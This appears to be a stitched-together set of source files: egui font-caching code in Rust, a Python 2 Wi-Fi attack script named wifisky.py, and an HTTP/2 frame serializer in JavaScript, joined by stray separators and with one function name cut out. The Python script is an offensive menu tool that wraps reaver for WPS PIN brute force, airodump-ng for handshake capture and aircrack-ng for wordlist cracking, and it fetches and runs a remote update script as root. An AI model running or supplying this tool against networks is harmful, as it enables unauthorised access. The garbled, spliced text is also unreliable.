panic!("FontFamily::{:?} is not bound to any fonts", family)
});
let fonts: Vec<Arc<FontImpl>> = fonts
.iter()
.map(|font_name| self.font_impl_cache.font_impl(scale_in_pixels, font_name))
.collect();
Font::new(fonts)
})
}
/// Width of this character in points.
fn glyph_width(&mut self, font_id: &FontId, c: char) -> f32 {
self.font(font_id).glyph_width(c)
}
/// Height of one row of text, in points
fn row_height(&mut self, font_id: &FontId) -> f32 {
self.font(font_id).row_height()
}
}
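// Editor's note: `font()` above caches one `Font` per (rounded pixel size, family)
// pair in `sized_family`, so repeated lookups for the same `FontId` are cheap hash
// hits; only previously unseen size/family combinations build a new `FontImpl` list.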
// ----------------------------------------------------------------------------
struct CachedGalley {
/// When it was last used
last_used: u32,
galley: Arc<Galley>,
}
#[derive(Default)]
struct GalleyCache {
/// Frame counter used to do garbage collection on the cache
generation: u32,
cache: nohash_hasher::IntMap<u64, CachedGalley>,
}
impl GalleyCache {
fn layout(&mut self, fonts: &mut FontsImpl, job: LayoutJob) -> Arc<Galley> {
let hash = crate::util::hash(&job); // TODO: even faster hasher?
match self.cache.entry(hash) {
std::collections::hash_map::Entry::Occupied(entry) => {
let cached = entry.into_mut();
cached.last_used = self.generation;
cached.galley.clone()
}
std::collections::hash_map::Entry::Vacant(entry) => {
let galley = super::layout(fonts, job.into());
let galley = Arc::new(galley);
entry.insert(CachedGalley {
last_used: self.generation,
galley: galley.clone(),
});
galley
}
}
}
pub fn num_galleys_in_cache(&self) -> usize {
self.cache.len()
}
/// Must be called once per frame to clear the [`Galley`] cache.
pub fn flush_cache(&mut self) {
let current_generation = self.generation;
self.cache.retain(|_key, cached| {
cached.last_used == current_generation // only keep those that were used this frame
});
self.generation = self.generation.wrapping_add(1);
}
}
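// Editor's note on the eviction scheme above: a galley laid out during generation N
// is stamped `last_used = N`; the next `flush_cache()` keeps only entries stamped N
// and bumps the counter, so any galley not re-requested for one full frame is dropped.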
// ----------------------------------------------------------------------------
struct FontImplCache {
atlas: Arc<Mutex<TextureAtlas>>,
pixels_per_point: f32,
ab_glyph_fonts: BTreeMap<String, (FontTweak, ab_glyph::FontArc)>,
/// Map font pixel sizes and names to the cached `FontImpl`.
cache: ahash::AHashMap<(u32, String), Arc<FontImpl>>,
}
impl FontImplCache {
pub fn new(
atlas: Arc<Mutex<TextureAtlas>>,
pixels_per_point: f32,
font_data: &BTreeMap<String, FontData>,
) -> Self {
let ab_glyph_fonts = font_data
.iter()
.map(|(name, font_data)| {
let tweak = font_data.tweak;
let ab_glyph = ab_glyph_font_from_font_data(name, font_data);
(name.clone(), (tweak, ab_glyph))
})
.collect();
Self {
atlas,
pixels_per_point,
ab_glyph_fonts,
cache: Default::default(),
}
}
#[inline]
pub fn scale_as_pixels(&self, scale_in_points: f32) -> u32 {
let scale_in_pixels = self.pixels_per_point * scale_in_points;
// Round to an even number of physical pixels to get even kerning.
// See https://github.com/emilk/egui/issues/382
scale_in_pixels.round() as u32
}
pub fn font_impl(&mut self, scale_in_pixels: u32, font_name: &str) -> Arc<FontImpl> {
let (tweak, ab_glyph_font) = self
.ab_glyph_fonts
.get(font_name)
.unwrap_or_else(|| panic!("No font data found for {:?}", font_name))
.clone();
let scale_in_pixels = (scale_in_pixels as f32 * tweak.scale).round() as u32;
let y_offset_points = {
let scale_in_points = scale_in_pixels as f32 / self.pixels_per_point;
scale_in_points * tweak.y_offset_factor
} + tweak.y_offset;
self.cache
.entry((scale_in_pixels, font_name.to_owned()))
.or_insert_with(|| {
Arc::new(FontImpl::new(
self.atlas.clone(),
self.pixels_per_point,
ab_glyph_font,
scale_in_pixels,
y_offset_points,
))
})
.clone()
}
} | |
wifisky.py | import os
import sys
import subprocess
from os import system
from time import sleep
follow = """
{+}-- https://www.facebook.com/dzmanisso
{+}-- https://twitter.com/ManissoDz
{+}-- https://github.com/Manisso
{+}-- https://www.linkedin.com/in/Manisso
{+}-- https://www.instagram.com/man.i.s/
"""
#Wash is a utility for identifying WPS enabled access points. It can survey from a live interface or it can scan a list of pcap files.
#Wash is an auxiliary tool designed to display WPS enabled Access Points and their main characteristics. Wash is included in the Reaver package.
#Homepage: https://github.com/t6x/reaver-wps-fork-t6x
#Author: Tactical Network Solutions, Craig Heffner, t6_x, DataHead, Soxrok2212
#License: GPLv2
#Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2
#Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
#Reaver Homepage | Kali Reaver Repo
#Author: Tactical Network Solutions, Craig Heffner
##License: GPLv2
logo = """\033[93m __ ___ __ __
.--.--.--.|__|.' _|__|.-----.| |--.--.--.
| | | || || _| ||__ --|| <| | |
|________||__||__| |__||_____||__|__|___ |
\033[91m }--{+} Coded By Manisso {+}--{\033[0m\033[93m|_____|\033[0m
"""
menu = """\033[97m
{1}--WPS ATTACK
{2}--WPA/WPA2 ATTACK
{3}--CAP BRUTFORCE
{0}--INSTALL & UPDATE
{99}-EXIT
"""
if not os.geteuid() == 0:
sys.exit("""\033[1;91m\n[!] Must be run as root. [!]\n\033[1;m""")
os.system("clear && clear")
print logo
print menu
def | ():
con = raw_input('Continue [Y/n] -> ')
if con[0].upper() == 'N':
exit()
else:
os.system("clear")
print logo
print menu
select()
def select():
try:
choice = input("\033[92mWIFISKY~# \033[0m")
if choice == 1:
os.system("airmon-ng")
interface = raw_input("Enter your Interface : ")
inter = 'ifconfig {0} down && iwconfig {0} mode monitor && ifconfig {0} up'.format(interface)
system(inter)
wash = 'wash -i {0}'.format(interface)
print "\033[1mCtrl + C To Stop \033[0m"
system(wash)
print (" ")
bssid = raw_input("BSSID: ")
print "\033[1mWPS ATTACK will start now\033[0m"
sleep(5)
reaver = 'reaver -i {0} -b {1} '.format(interface, bssid)
system(reaver)
elif choice == 2:
os.system("airmon-ng")
interface = raw_input("Enter your Interface : ")
inter = 'ifconfig {0} down && iwconfig {0} mode monitor && ifconfig {0} up'.format(interface)
system(inter)
dump = 'airodump-ng {0}'.format(interface)
print "\033[1mCtrl + C To Stop \033[0m"
sleep(3)
system(dump)
print (" ")
bssid = raw_input("BSSID: ")
ch = raw_input("channel : ")
sv = raw_input("File Name : ")
airo = 'airodump-ng -c {0} --bssid {1} -w {2} {3}'.format(ch, bssid, sv, interface)
system(airo)
elif choice == 99:
exit()
elif choice == 0:
os.system("clear")
print("This tool is only available for Linux and similar systems ")
os.system("git clone https://github.com/Manisso/wifisky.git")
os.system("cd wifisky && sudo bash ./update.sh")
os.system("wifisky")
elif choice == 3:
wordlist = raw_input("wordlist : ")
save2 = raw_input("Enter the CAP file name : ")
crack = 'aircrack-ng {0} -w {1} '.format(save2, wordlist)
system(crack)
except(KeyboardInterrupt):
print ""
select()
| quit |
framer.js | // The framer consists of two [Transform Stream][1] subclasses that operate in [object mode][2]:
// the Serializer and the Deserializer
// [1]: https://nodejs.org/api/stream.html#stream_class_stream_transform
// [2]: https://nodejs.org/api/stream.html#stream_new_stream_readable_options
var assert = require('assert');
var Transform = require('stream').Transform;
exports.Serializer = Serializer;
exports.Deserializer = Deserializer;
var logData = (typeof process !== 'undefined' && typeof process.env !== 'undefined' && process.env.HTTP2_LOG_DATA);
var MAX_PAYLOAD_SIZE = 16384;
var WINDOW_UPDATE_PAYLOAD_SIZE = 4;
// Serializer
// ----------
//
// Frame Objects
// * * * * * * * --+---------------------------
// | |
// v v Buffers
// [] -----> Payload Ser. --[buffers]--> Header Ser. --> * * * *
// empty adds payload adds header
// array buffers buffer
function Serializer(log) {
this._log = log.child({ component: 'serializer' });
Transform.call(this, { objectMode: true });
}
Serializer.prototype = Object.create(Transform.prototype, { constructor: { value: Serializer } });
// When there's an incoming frame object, it first generates the frame type specific part of the
// frame (payload), and then adds the header part which holds fields that are common to all
// frame types (like the length of the payload).
Serializer.prototype._transform = function _transform(frame, encoding, done) {
this._log.trace({ frame: frame }, 'Outgoing frame');
assert(frame.type in Serializer, 'Unknown frame type: ' + frame.type);
var buffers = [];
Serializer[frame.type](frame, buffers);
var length = Serializer.commonHeader(frame, buffers);
assert(length <= MAX_PAYLOAD_SIZE, 'Frame too large!');
for (var i = 0; i < buffers.length; i++) {
if (logData) {
this._log.trace({ data: buffers[i] }, 'Outgoing data');
}
this.push(buffers[i]);
}
done();
};
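// Editor's sketch (not part of the original file): the serializer is an object-mode
// Transform, so callers write plain frame objects like the one below; the exact
// attributes per frame type are listed in `typeSpecificAttributes` further down.
//
// serializer.write({
//   type: 'DATA',
//   flags: { END_STREAM: true },
//   stream: 1,
//   data: new Buffer('hello')
// });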
// Deserializer
// ------------
//
// Buffers
// * * * * --------+-------------------------
// | |
// v v Frame Objects
// {} -----> Header Des. --{frame}--> Payload Des. --> * * * * * * *
// empty adds parsed adds parsed
// object header properties payload properties
function Deserializer(log, role) {
this._role = role;
this._log = log.child({ component: 'deserializer' });
Transform.call(this, { objectMode: true });
this._next(COMMON_HEADER_SIZE);
}
Deserializer.prototype = Object.create(Transform.prototype, { constructor: { value: Deserializer } });
// The Deserializer is stateful, and its two main alternating states are: *waiting for header* and
// *waiting for payload*. The state is stored in the boolean property `_waitingForHeader`.
//
// When entering a new state, a `_buffer` is created that will hold the accumulated data (header or
// payload). The `_cursor` is used to track the progress.
Deserializer.prototype._next = function(size) {
this._cursor = 0;
this._buffer = new Buffer(size);
this._waitingForHeader = !this._waitingForHeader;
if (this._waitingForHeader) {
this._frame = {};
}
};
// Parsing an incoming buffer is an iterative process because it can hold multiple frames if it's
// large enough. A `cursor` is used to track the progress in parsing the incoming `chunk`.
Deserializer.prototype._transform = function _transform(chunk, encoding, done) {
var cursor = 0;
if (logData) {
this._log.trace({ data: chunk }, 'Incoming data');
}
while(cursor < chunk.length) {
// The content of an incoming buffer is first copied to `_buffer`. If it can't hold the full
// chunk, then only a part of it is copied.
var toCopy = Math.min(chunk.length - cursor, this._buffer.length - this._cursor);
chunk.copy(this._buffer, this._cursor, cursor, cursor + toCopy);
this._cursor += toCopy;
cursor += toCopy;
// When `_buffer` is full, its content gets parsed either as header or payload depending on
// the actual state.
// If it's header then the parsed data is stored in a temporary variable and then the
// deserializer waits for the specified length payload.
if ((this._cursor === this._buffer.length) && this._waitingForHeader) {
var payloadSize = Deserializer.commonHeader(this._buffer, this._frame);
if (payloadSize <= MAX_PAYLOAD_SIZE) {
this._next(payloadSize);
} else {
this.emit('error', 'FRAME_SIZE_ERROR');
return;
}
}
// If it's payload then the frame object is finalized and then gets pushed out.
// Unknown frame types are ignored.
//
// Note: If we just finished the parsing of a header and the payload length is 0, this branch
// will also run.
if ((this._cursor === this._buffer.length) && !this._waitingForHeader) {
if (this._frame.type) {
var error = Deserializer[this._frame.type](this._buffer, this._frame, this._role);
if (error) {
this._log.error('Incoming frame parsing error: ' + error);
this.emit('error', error);
} else {
this._log.trace({ frame: this._frame }, 'Incoming frame');
this.push(this._frame);
}
} else {
this._log.error('Unknown type incoming frame');
// Ignore it other than logging
}
this._next(COMMON_HEADER_SIZE);
}
}
done();
};
// [Frame Header](https://tools.ietf.org/html/rfc7540#section-4.1)
// --------------------------------------------------------------
//
// HTTP/2 frames share a common base format consisting of a 9-byte header followed by 0 to 2^24 - 1
// bytes of data.
//
// Additional size limits can be set by specific application uses. HTTP limits the frame size to
// 16,384 octets by default, though this can be increased by a receiver.
//
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// | Length (24) |
// +---------------+---------------+---------------+
// | Type (8) | Flags (8) |
// +-+-----------------------------+---------------+---------------+
// |R| Stream Identifier (31) |
// +-+-------------------------------------------------------------+
// | Frame Data (0...) ...
// +---------------------------------------------------------------+
//
// The fields of the frame header are defined as:
//
// * Length:
// The length of the frame data expressed as an unsigned 24-bit integer. The 9 bytes of the frame
// header are not included in this value.
//
// * Type:
// The 8-bit type of the frame. The frame type determines how the remainder of the frame header
// and data are interpreted. Implementations MUST ignore unsupported and unrecognized frame types.
//
// * Flags:
// An 8-bit field reserved for frame-type specific boolean flags.
//
// Flags are assigned semantics specific to the indicated frame type. Flags that have no defined
// semantics for a particular frame type MUST be ignored, and MUST be left unset (0) when sending.
//
// * R:
// A reserved 1-bit field. The semantics of this bit are undefined and the bit MUST remain unset
// (0) when sending and MUST be ignored when receiving.
//
// * Stream Identifier:
// A 31-bit stream identifier. The value 0 is reserved for frames that are associated with the
// connection as a whole as opposed to an individual stream.
//
// The structure and content of the remaining frame data is dependent entirely on the frame type.
var COMMON_HEADER_SIZE = 9;
var frameTypes = [];
var frameFlags = {};
var genericAttributes = ['type', 'flags', 'stream'];
var typeSpecificAttributes = {};
Serializer.commonHeader = function writeCommonHeader(frame, buffers) {
var headerBuffer = new Buffer(COMMON_HEADER_SIZE);
var size = 0;
for (var i = 0; i < buffers.length; i++) {
size += buffers[i].length;
}
headerBuffer.writeUInt8(0, 0);
headerBuffer.writeUInt16BE(size, 1);
var typeId = frameTypes.indexOf(frame.type); // If we are here then the type is valid for sure
headerBuffer.writeUInt8(typeId, 3);
var flagByte = 0;
for (var flag in frame.flags) {
var position = frameFlags[frame.type].indexOf(flag);
assert(position !== -1, 'Unknown flag for frame type ' + frame.type + ': ' + flag);
if (frame.flags[flag]) {
flagByte |= (1 << position);
}
}
headerBuffer.writeUInt8(flagByte, 4);
assert((0 <= frame.stream) && (frame.stream < 0x7fffffff), frame.stream);
headerBuffer.writeUInt32BE(frame.stream || 0, 5);
buffers.unshift(headerBuffer);
return size;
};
Deserializer.commonHeader = function readCommonHeader(buffer, frame) {
if (buffer.length < 9) {
return 'FRAME_SIZE_ERROR';
}
var totallyWastedByte = buffer.readUInt8(0);
var length = buffer.readUInt16BE(1);
// We do this just for sanity checking later on, to make sure no one sent us a
// frame that's super large.
length += totallyWastedByte << 16;
frame.type = frameTypes[buffer.readUInt8(3)];
if (!frame.type) {
// We are required to ignore unknown frame types
return length;
}
frame.flags = {};
var flagByte = buffer.readUInt8(4);
var definedFlags = frameFlags[frame.type];
for (var i = 0; i < definedFlags.length; i++) {
frame.flags[definedFlags[i]] = Boolean(flagByte & (1 << i));
}
frame.stream = buffer.readUInt32BE(5) & 0x7fffffff;
return length;
};
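// Worked example (editor's addition): a 5-byte DATA payload with END_STREAM set on
// stream 1 gets the 9-byte header
//   00 00 05  00  01  00 00 00 01
//   (length)  type flags (stream identifier)
// which is exactly what writeCommonHeader() emits and what readCommonHeader() parses
// back into { type: 'DATA', flags: { END_STREAM: true, ... }, stream: 1 }.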
// Frame types
// ===========
// Every frame type is registered in the following places:
//
// * `frameTypes`: a register of frame type codes (used by `commonHeader()`)
// * `frameFlags`: a register of valid flags for frame types (used by `commonHeader()`)
// * `typeSpecificAttributes`: a register of frame specific frame object attributes (used by
// logging code and also serves as documentation for frame objects)
// [DATA Frames](https://tools.ietf.org/html/rfc7540#section-6.1)
// ------------------------------------------------------------
//
// DATA frames (type=0x0) convey arbitrary, variable-length sequences of octets associated with a
// stream.
//
// The DATA frame defines the following flags:
//
// * END_STREAM (0x1):
// Bit 1 being set indicates that this frame is the last that the endpoint will send for the
// identified stream.
// * PADDED (0x08):
// Bit 4 being set indicates that the Pad Length field is present.
frameTypes[0x0] = 'DATA';
frameFlags.DATA = ['END_STREAM', 'RESERVED2', 'RESERVED4', 'PADDED'];
typeSpecificAttributes.DATA = ['data'];
Serializer.DATA = function writeData(frame, buffers) {
buffers.push(frame.data);
};
Deserializer.DATA = function readData(buffer, frame) {
var dataOffset = 0;
var paddingLength = 0;
if (frame.flags.PADDED) {
if (buffer.length < 1) {
// We must have at least one byte for padding control, but we don't. Bad peer!
return 'FRAME_SIZE_ERROR';
}
paddingLength = (buffer.readUInt8(dataOffset) & 0xff);
dataOffset = 1;
}
if (paddingLength) {
if (paddingLength >= (buffer.length - 1)) {
// We don't have enough room for the padding advertised - bad peer!
return 'FRAME_SIZE_ERROR';
}
frame.data = buffer.slice(dataOffset, -1 * paddingLength);
} else {
frame.data = buffer.slice(dataOffset);
}
};
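// Note (editor's addition): when the PADDED flag is set, `frame.data` above excludes
// both the one-byte Pad Length field and the trailing padding octets, so downstream
// code only ever sees the application data.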
// [HEADERS](https://tools.ietf.org/html/rfc7540#section-6.2)
// --------------------------------------------------------------
//
// The HEADERS frame (type=0x1) allows the sender to create a stream.
//
// The HEADERS frame defines the following flags:
//
// * END_STREAM (0x1):
// Bit 1 being set indicates that this frame is the last that the endpoint will send for the
// identified stream.
// * END_HEADERS (0x4):
// The END_HEADERS bit indicates that this frame contains the entire payload necessary to provide
// a complete set of headers.
// * PADDED (0x08):
// Bit 4 being set indicates that the Pad Length field is present.
// * PRIORITY (0x20):
// Bit 6 being set indicates that the Exclusive Flag (E), Stream Dependency, and Weight fields are
// present.
frameTypes[0x1] = 'HEADERS';
frameFlags.HEADERS = ['END_STREAM', 'RESERVED2', 'END_HEADERS', 'PADDED', 'RESERVED5', 'PRIORITY'];
typeSpecificAttributes.HEADERS = ['priorityDependency', 'priorityWeight', 'exclusiveDependency', 'headers', 'data'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// |Pad Length? (8)|
// +-+-------------+---------------+-------------------------------+
// |E| Stream Dependency? (31) |
// +-+-------------+-----------------------------------------------+
// | Weight? (8) |
// +-+-------------+-----------------------------------------------+
// | Header Block Fragment (*) ...
// +---------------------------------------------------------------+
// | Padding (*) ...
// +---------------------------------------------------------------+
//
// The payload of a HEADERS frame contains a Headers Block
Serializer.HEADERS = function writeHeadersPriority(frame, buffers) {
if (frame.flags.PRIORITY) {
var buffer = new Buffer(5);
assert((0 <= frame.priorityDependency) && (frame.priorityDependency <= 0x7fffffff), frame.priorityDependency);
buffer.writeUInt32BE(frame.priorityDependency, 0);
if (frame.exclusiveDependency) {
buffer[0] |= 0x80;
}
assert((0 <= frame.priorityWeight) && (frame.priorityWeight <= 0xff), frame.priorityWeight);
buffer.writeUInt8(frame.priorityWeight, 4);
buffers.push(buffer);
}
buffers.push(frame.data);
};
Deserializer.HEADERS = function readHeadersPriority(buffer, frame) {
var minFrameLength = 0;
if (frame.flags.PADDED) {
minFrameLength += 1;
}
if (frame.flags.PRIORITY) {
minFrameLength += 5;
}
if (buffer.length < minFrameLength) {
// Peer didn't send enough data - bad peer!
return 'FRAME_SIZE_ERROR';
}
var dataOffset = 0;
var paddingLength = 0;
if (frame.flags.PADDED) {
paddingLength = (buffer.readUInt8(dataOffset) & 0xff);
dataOffset = 1;
}
if (frame.flags.PRIORITY) {
var dependencyData = new Buffer(4);
buffer.copy(dependencyData, 0, dataOffset, dataOffset + 4);
dataOffset += 4;
frame.exclusiveDependency = !!(dependencyData[0] & 0x80);
dependencyData[0] &= 0x7f;
frame.priorityDependency = dependencyData.readUInt32BE(0);
frame.priorityWeight = buffer.readUInt8(dataOffset);
dataOffset += 1;
}
if (paddingLength) {
if ((buffer.length - dataOffset) < paddingLength) {
// Not enough data left to satisfy the advertised padding - bad peer!
return 'FRAME_SIZE_ERROR';
}
frame.data = buffer.slice(dataOffset, -1 * paddingLength);
} else {
frame.data = buffer.slice(dataOffset);
}
};
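// Worked example (editor's addition): with the PRIORITY flag set, the first five
// payload bytes are E + 31-bit Stream Dependency followed by an 8-bit weight, so
//   80 00 00 03 0f
// decodes to exclusiveDependency = true, priorityDependency = 3, priorityWeight = 15,
// and the remaining bytes form the header block fragment in `frame.data`.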
// [PRIORITY](https://tools.ietf.org/html/rfc7540#section-6.3)
// -------------------------------------------------------
//
// The PRIORITY frame (type=0x2) specifies the sender-advised priority of a stream.
//
// The PRIORITY frame does not define any flags.
frameTypes[0x2] = 'PRIORITY';
frameFlags.PRIORITY = [];
typeSpecificAttributes.PRIORITY = ['priorityDependency', 'priorityWeight', 'exclusiveDependency'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// |E| Stream Dependency? (31) |
// +-+-------------+-----------------------------------------------+
// | Weight? (8) |
// +-+-------------+
//
// The payload of a PRIORITY frame contains an exclusive bit, a 31-bit dependency, and an 8-bit weight
Serializer.PRIORITY = function writePriority(frame, buffers) {
var buffer = new Buffer(5);
assert((0 <= frame.priorityDependency) && (frame.priorityDependency <= 0x7fffffff), frame.priorityDependency);
buffer.writeUInt32BE(frame.priorityDependency, 0);
if (frame.exclusiveDependency) {
buffer[0] |= 0x80;
}
assert((0 <= frame.priorityWeight) && (frame.priorityWeight <= 0xff), frame.priorityWeight);
buffer.writeUInt8(frame.priorityWeight, 4);
buffers.push(buffer);
};
Deserializer.PRIORITY = function readPriority(buffer, frame) {
if (buffer.length < 5) {
// PRIORITY frames are 5 bytes long. Bad peer!
return 'FRAME_SIZE_ERROR';
}
var dependencyData = new Buffer(4);
buffer.copy(dependencyData, 0, 0, 4);
frame.exclusiveDependency = !!(dependencyData[0] & 0x80);
dependencyData[0] &= 0x7f;
frame.priorityDependency = dependencyData.readUInt32BE(0);
frame.priorityWeight = buffer.readUInt8(4);
};
// [RST_STREAM](https://tools.ietf.org/html/rfc7540#section-6.4)
// -----------------------------------------------------------
//
// The RST_STREAM frame (type=0x3) allows for abnormal termination of a stream.
//
// No type-flags are defined.
frameTypes[0x3] = 'RST_STREAM';
frameFlags.RST_STREAM = [];
typeSpecificAttributes.RST_STREAM = ['error'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// | Error Code (32) |
// +---------------------------------------------------------------+
//
// The RST_STREAM frame contains a single unsigned, 32-bit integer identifying the error
// code (see Error Codes). The error code indicates why the stream is being terminated.
Serializer.RST_STREAM = function writeRstStream(frame, buffers) {
var buffer = new Buffer(4);
var code = errorCodes.indexOf(frame.error);
assert((0 <= code) && (code <= 0xffffffff), code);
buffer.writeUInt32BE(code, 0);
buffers.push(buffer);
};
Deserializer.RST_STREAM = function readRstStream(buffer, frame) {
if (buffer.length < 4) {
// RST_STREAM is 4 bytes long. Bad peer!
return 'FRAME_SIZE_ERROR';
}
frame.error = errorCodes[buffer.readUInt32BE(0)];
if (!frame.error) {
// Unknown error codes are considered equivalent to INTERNAL_ERROR
frame.error = 'INTERNAL_ERROR';
}
};
// [SETTINGS](https://tools.ietf.org/html/rfc7540#section-6.5)
// -------------------------------------------------------
//
// The SETTINGS frame (type=0x4) conveys configuration parameters that affect how endpoints
// communicate.
//
// The SETTINGS frame defines the following flag:
// * ACK (0x1):
// Bit 1 being set indicates that this frame acknowledges receipt and application of the peer's
// SETTINGS frame.
frameTypes[0x4] = 'SETTINGS';
frameFlags.SETTINGS = ['ACK'];
typeSpecificAttributes.SETTINGS = ['settings'];
// The payload of a SETTINGS frame consists of zero or more settings. Each setting consists of a
// 16-bit identifier, and an unsigned 32-bit value.
//
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// | Identifier(16) | Value (32) |
// +-----------------+---------------------------------------------+
// ...Value |
// +---------------------------------+
//
// Each setting in a SETTINGS frame replaces the existing value for that setting. Settings are
// processed in the order in which they appear, and a receiver of a SETTINGS frame does not need to
// maintain any state other than the current value of settings. Therefore, the value of a setting
// is the last value that is seen by a receiver. This permits the inclusion of the same settings
// multiple times in the same SETTINGS frame, though doing so does nothing other than waste
// connection capacity.
Serializer.SETTINGS = function writeSettings(frame, buffers) {
var settings = [], settingsLeft = Object.keys(frame.settings);
definedSettings.forEach(function(setting, id) {
if (setting.name in frame.settings) {
settingsLeft.splice(settingsLeft.indexOf(setting.name), 1);
var value = frame.settings[setting.name];
settings.push({ id: id, value: setting.flag ? Boolean(value) : value });
}
});
assert(settingsLeft.length === 0, 'Unknown settings: ' + settingsLeft.join(', '));
var buffer = new Buffer(settings.length * 6);
for (var i = 0; i < settings.length; i++) {
buffer.writeUInt16BE(settings[i].id & 0xffff, i*6);
buffer.writeUInt32BE(settings[i].value, i*6 + 2);
}
buffers.push(buffer);
};
Deserializer.SETTINGS = function readSettings(buffer, frame, role) {
frame.settings = {};
// Receipt of a SETTINGS frame with the ACK flag set and a length
// field value other than 0 MUST be treated as a connection error
// (Section 5.4.1) of type FRAME_SIZE_ERROR.
if(frame.flags.ACK && buffer.length != 0) {
return 'FRAME_SIZE_ERROR';
}
if (buffer.length % 6 !== 0) {
return 'PROTOCOL_ERROR';
}
for (var i = 0; i < buffer.length / 6; i++) {
var id = buffer.readUInt16BE(i*6) & 0xffff;
var setting = definedSettings[id];
if (setting) {
if (role == 'CLIENT' && setting.name == 'SETTINGS_ENABLE_PUSH') {
return 'SETTINGS frame on client got SETTINGS_ENABLE_PUSH';
}
var value = buffer.readUInt32BE(i*6 + 2);
frame.settings[setting.name] = setting.flag ? Boolean(value & 0x1) : value;
}
}
};
// The following settings are defined:
var definedSettings = [];
// * SETTINGS_HEADER_TABLE_SIZE (1):
// Allows the sender to inform the remote endpoint of the size of the header compression table
// used to decode header blocks.
definedSettings[1] = { name: 'SETTINGS_HEADER_TABLE_SIZE', flag: false };
// * SETTINGS_ENABLE_PUSH (2):
// This setting can be used to disable server push. An endpoint MUST NOT send a PUSH_PROMISE frame
// if it receives this setting set to a value of 0. The default value is 1, which indicates that
// push is permitted.
definedSettings[2] = { name: 'SETTINGS_ENABLE_PUSH', flag: true };
// * SETTINGS_MAX_CONCURRENT_STREAMS (3):
// indicates the maximum number of concurrent streams that the sender will allow.
definedSettings[3] = { name: 'SETTINGS_MAX_CONCURRENT_STREAMS', flag: false };
// * SETTINGS_INITIAL_WINDOW_SIZE (4):
// indicates the sender's initial stream window size (in bytes) for new streams.
definedSettings[4] = { name: 'SETTINGS_INITIAL_WINDOW_SIZE', flag: false };
// * SETTINGS_MAX_FRAME_SIZE (5):
// indicates the maximum size of a frame the receiver will allow.
definedSettings[5] = { name: 'SETTINGS_MAX_FRAME_SIZE', flag: false };
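// Worked example (editor's addition): a SETTINGS frame carrying
// SETTINGS_MAX_CONCURRENT_STREAMS (id 3) = 100 and SETTINGS_INITIAL_WINDOW_SIZE
// (id 4) = 65535 has the 12-byte payload
//   00 03 00 00 00 64   00 04 00 00 ff ff
// i.e. a 16-bit identifier followed by a 32-bit value for each setting.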
// [PUSH_PROMISE](https://tools.ietf.org/html/rfc7540#section-6.6)
// ---------------------------------------------------------------
//
// The PUSH_PROMISE frame (type=0x5) is used to notify the peer endpoint in advance of streams the
// sender intends to initiate.
//
// The PUSH_PROMISE frame defines the following flags:
//
// * END_PUSH_PROMISE (0x4):
// The END_PUSH_PROMISE bit indicates that this frame contains the entire payload necessary to
// provide a complete set of headers.
frameTypes[0x5] = 'PUSH_PROMISE';
frameFlags.PUSH_PROMISE = ['RESERVED1', 'RESERVED2', 'END_PUSH_PROMISE', 'PADDED'];
typeSpecificAttributes.PUSH_PROMISE = ['promised_stream', 'headers', 'data'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// |Pad Length? (8)|
// +-+-------------+-----------------------------------------------+
// |X| Promised-Stream-ID (31) |
// +-+-------------------------------------------------------------+
// | Header Block Fragment (*) ...
// +---------------------------------------------------------------+
// | Padding (*) ...
// +---------------------------------------------------------------+
//
// The PUSH_PROMISE frame includes the unsigned 31-bit identifier of
// the stream the endpoint plans to create along with a minimal set of headers that provide
// additional context for the stream.
Serializer.PUSH_PROMISE = function writePushPromise(frame, buffers) {
var buffer = new Buffer(4);
var promised_stream = frame.promised_stream;
assert((0 <= promised_stream) && (promised_stream <= 0x7fffffff), promised_stream);
buffer.writeUInt32BE(promised_stream, 0);
buffers.push(buffer);
buffers.push(frame.data);
};
Deserializer.PUSH_PROMISE = function readPushPromise(buffer, frame) {
if (buffer.length < 4) {
return 'FRAME_SIZE_ERROR';
}
var dataOffset = 0;
var paddingLength = 0;
if (frame.flags.PADDED) {
if (buffer.length < 5) {
return 'FRAME_SIZE_ERROR';
}
paddingLength = (buffer.readUInt8(dataOffset) & 0xff);
dataOffset = 1;
}
frame.promised_stream = buffer.readUInt32BE(dataOffset) & 0x7fffffff;
dataOffset += 4;
if (paddingLength) {
if ((buffer.length - dataOffset) < paddingLength) {
return 'FRAME_SIZE_ERROR';
}
frame.data = buffer.slice(dataOffset, -1 * paddingLength);
} else {
frame.data = buffer.slice(dataOffset);
}
};
// [PING](https://tools.ietf.org/html/rfc7540#section-6.7)
// -----------------------------------------------
//
// The PING frame (type=0x6) is a mechanism for measuring a minimal round-trip time from the
// sender, as well as determining whether an idle connection is still functional.
//
// The PING frame defines one type-specific flag:
//
// * ACK (0x1):
// Bit 1 being set indicates that this PING frame is a PING response.
frameTypes[0x6] = 'PING';
frameFlags.PING = ['ACK'];
typeSpecificAttributes.PING = ['data'];
